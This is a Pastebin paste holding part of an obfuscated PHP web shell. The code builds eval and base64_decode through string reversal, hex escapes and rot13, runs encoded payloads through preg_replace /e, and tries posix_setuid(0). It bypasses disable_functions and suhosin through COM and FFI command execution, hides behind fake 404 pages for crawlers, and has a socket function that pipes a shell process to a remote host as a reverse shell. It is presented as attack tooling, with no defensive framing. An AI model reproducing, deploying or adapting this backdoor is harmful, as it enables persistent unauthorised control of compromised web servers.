API tools faq
paste
Lulz-Tigre

shell

Lulz-Tigre
Jun 11th, 2016
307
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.40 KB | None | 0 0
raw download clone embed print report
  1. ding guidelines: use suhosin_func_exists copiously to avoid getting kill()'d , don't write one liners |
  2. | |
  3. | Features: evade disable_functions, suhosin, and aggressive caching through various tricks, including SSH |
  4. | the daemon said |
  5. | code the best shell in the world |
  6. | or i'll eat your soul |
  7. | and me and htp we all looked at each other |
  8. | and we each said, "okay" |
  9. | and we wrote the first thing that came to our heads and it just so happened to be |
  10. | the best shell in the world |
  11. | it was the best shell in the world |
  12. | This is not the greatest shell in the world, no. This is just a tribute. | |
  13. \*********************************************************************************************************************/
  14. $phpversion = explode('.', phpversion());
  15. $nintendosixtyfour = strrev(strrev("decode")."_46esab");
  16. $toronly = false; // set this to true to allow ONLY Tor exits to access the shell
  17. $clientip = $_SERVER["REMOTE_ADDR"];
  18. if ($toronly === true && rblcheck($clientip) === false) error404();
  19. // hey, can't blame me for trying!
  20. if (suhosin_func_exists("\x70\x6f\x73\x69\x78_\x73e\x74u\x69d")) @posix_setuid(0);
  21. //desperate attempt to get zlib functions
  22. if (suhosin_func_exists("dl") && !suhosin_func_exists("\x67\x7ain\x66la\x74e")) @dl("zlib.so");
  23. if (suhosin_func_exists("ini_get")) $gzip = @ini_get("zlib.output_compression"); // LOL, IDS
  24. else $gzip = false; // LOL, FAIL
  25. //if (extension_loaded("zlib") && $gzip == false) ob_start("ob_gzhandler");
  26. if (suhosin_func_exists("putenv") && (windows() == false)) {
  27. if(suhosin_func_exists("getenv")) {
  28. putenv("PATH=".getenv('PATH').":/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin");
  29. } else {
  30. putenv("PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin");
  31. }
  32. }
  33. $password = "e1d8920ffc4f2c9210a7fcd7fe9cb9cf"; // fuhosin
  34. $bots = array('bot','spider','archive','crawl','robot','search','seek','cache');
  35. $UA = strtolower($_SERVER['HTTP_USER_AGENT']);
  36. foreach ($bots AS $BOT) { if (strpos($UA,$BOT) !== FALSE) { error404(); } }
  37. $sorcery = "\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65";
  38. // begin base64/gz blobs
  39. $php5only = "ZnVuY3Rpb24gY29tX2V4ZWMoJGNtZCkgeyAvLyBCeXBhc3MgIzM6IENPTSBvYmplY3RzCiAgICAgICAgJHJlc3VsdCA9ICIiOwoJaWYoY2xhc3NfZXhpc3RzKCJDT00iKSkgewoJCSR3c2NyaXB0ID0gbmV3IENPTSgnd3NjcmlwdC5zaGVsbCcpOyAgICAgICAgICAgICAgICAvL3dzY3JpcHQuZXhlCgkJJHJlc3VsdCA9ICR3c2NyaXB0LT5FeGVjKCJjbWQuZXhlIC9jICRjbWQiKS0+U3RkT3V0LT5SZWFkQWxsOyAKCX0KCXJldHVybiAkcmVzdWx0Owp9ICAgICAgICAKZnVuY3Rpb24gZmZpX2V4ZWMoJGNvbW1hbmQpIHsgLy8gV2luZG93cyBGRkkgZXhlYwoJJG5hbWU9d2hlcmVzX3RoZV9mdWNraW5nX3RtcF9kaXIoKS4iXFwiLnVuaXFpZCgnTkonKTsKCSRhcGk9bmV3IGZmaSgiW2xpYj0na2VybmVsMzIuZGxsJ10gaW50IFdpbkV4ZWMoY2hhciAqQVBQLGludCBTVyk7Iik7CgkkcmVzPSRhcGktPldpbkV4ZWMoImNtZC5leGUgL2MgJGNvbW1hbmQgPlwiJG5hbWVcIiIsMCk7Cgl3aGlsZSghZmlsZV9leGlzdHMoJG5hbWUpKXNsZWVwKDEpOwoJJGV4ZWM9ZmlsZV9nZXRfY29udGVudHMoJG5hbWUpOwoJdW5saW5rKCRuYW1lKTsKCXJldHVybiAkZXhlYzsKfQ==";
  40. //end base64/gz blobs
  41. ?><?php
  42. // begin funcs
  43. $c = str_rot13('riny(tmvasyngr(onfr64_qrpbqr($ovttnlffuyvo)));');
  44. $sorcery("/(.*)/e",$c,"");
  45. if($phpversion[0] != '4') {
  46. $php5only = $nintendosixtyfour($php5only);
  47. eval($php5only);
  48. } else {
  49. function com_exec($cmd) { return ""; }
  50. function ffi_exec($cmd) { return ""; }
  51. }
  52. if(suhosin_func_exists("ini_get") && suhosin_func_exists("ini_restore")
  53. && ini_get("s\x61f\x65_mo\x64e") !== false)
  54. ini_restore("saf\x65_mod\x65");
  55. function shellToSocketViaSelect($socket, $command) {
  56. $sockets = array(
  57. stream_socket_pair(STREAM_PF_UNIX, STREAM_SOCK_STREAM, STREAM_IPPROTO_IP),
  58. stream_socket_pair(STREAM_PF_UNIX, STREAM_SOCK_STREAM, STREAM_IPPROTO_IP),
  59. stream_socket_pair(STREAM_PF_UNIX, STREAM_SOCK_STREAM, STREAM_IPPROTO_IP)
  60. );
  61. $process = proc_open($command, array(
  62. 0 => $sockets[0][0],
  63. 1 => $sockets[1][0],
  64. 2 => $sockets[2][0],
  65. ), $pipes, null, null, array('bypass_shell' => true));
  66. if (is_resource($process)) {
  67. echo "Process $command opened successfully, multiplexing...";
  68. $running = true;
  69. foreach(array($sockets[1][1], $sockets[2][1]) as $k => $pipe) {
  70. stream_set_blocking($pipe, false);
  71. }
  72. $socket_int = intval($socket);
  73. $stdin = $sockets[0][1];
  74. while($running) {
  75. $reads = array($socket, $sockets[1][1], $sockets[2][1]);
  76. $write = $excepts = null;
  77. if (false === ($act = stream_select($reads, $writes, $excepts, 1))) {
  78. $running = false;
  79. } elseif ($act > 0) {
  80. print_r($reads);
  81. foreach($reads as $skt) {
  82. $skt_int = intval($skt);
  83. $buf = fread($skt, 4096);
  84. if (empty($buf)) {
  85. $running = false;
  86. break;
  87. } elseif ($skt_int === $socket_int) {
  88. safe_write($stdin, $buf);
  89. } else {
  90. safe_write($socket, $buf);
  91. }
  92. }
  93. }
  94. }
  95. proc_close($process);
  96. }
  97. }
  98. function connectToSocat($host, $port, $command) {
  99. $fp = stream_socket_client("tcp://$host:$port", $errno, $errstr, 30);
  100. if(!$fp) {
  101. echo "Error $errstr ($errno)\n";
  102. } else {
  103. shellToSocketViaSelect($fp, $command);
  104. }
  105. }
  106. function safe_write($socket, $buf) {
  107. stream_set_blocking($socket, true);
  108. fwrite($socket, $buf);
  109. stream_set_blocking($socket, false);
  110. }
  111. function handleError($errno, $errstr, $errfile, $errline, $errcontext) {
  112. if (0 === error_reporting()) {
  113. return false;
  114. }
  115. $GLOBALS["results"] .= "Err: ".strip_tags($errstr)."\n";
  116. }
  117. set_error_handler('handleError'); //Lazy error handling
  118. function windows() {
  119. $dir = getcwd();
  120. if(strlen($dir)>1 && $dir[1]==":") { return 1; }
  121. else return 0;
  122. }
  123. function error404(){
  124. if (strpos($_SERVER['SERVER_SOFTWARE'], 'mod_fastcgi') === FALSE || strpos($_SERVER["SERVER_SOFTWARE"], 'mod_fcgi') === FALSE) { header($_SERVER['SERVER_PROTOCOL'].' 404 Not Found'); }
  125. else { header('Status: 404 Not Found'); }
  126. echo
  127. '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  128. <html><head>
  129. <title>404 Not Found</title>
  130. </head><body>
  131. <h1>Not Found</h1>
  132. <p>The requested URL ',$_SERVER['PHP_SELF'],' was not found on this server.</p>
  133. </body></html> ';
  134. die;
  135. }
  136. function rblcheck($host) {
  137. $lookup = implode('.', array_reverse(explode('.', $host))) . ".80.0.39.194.173.ip-port.exitlist.torproject.org";
  138. if (strstr(gethostbyname($lookup), "127.0.0")) {
  139. return $rbl;
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!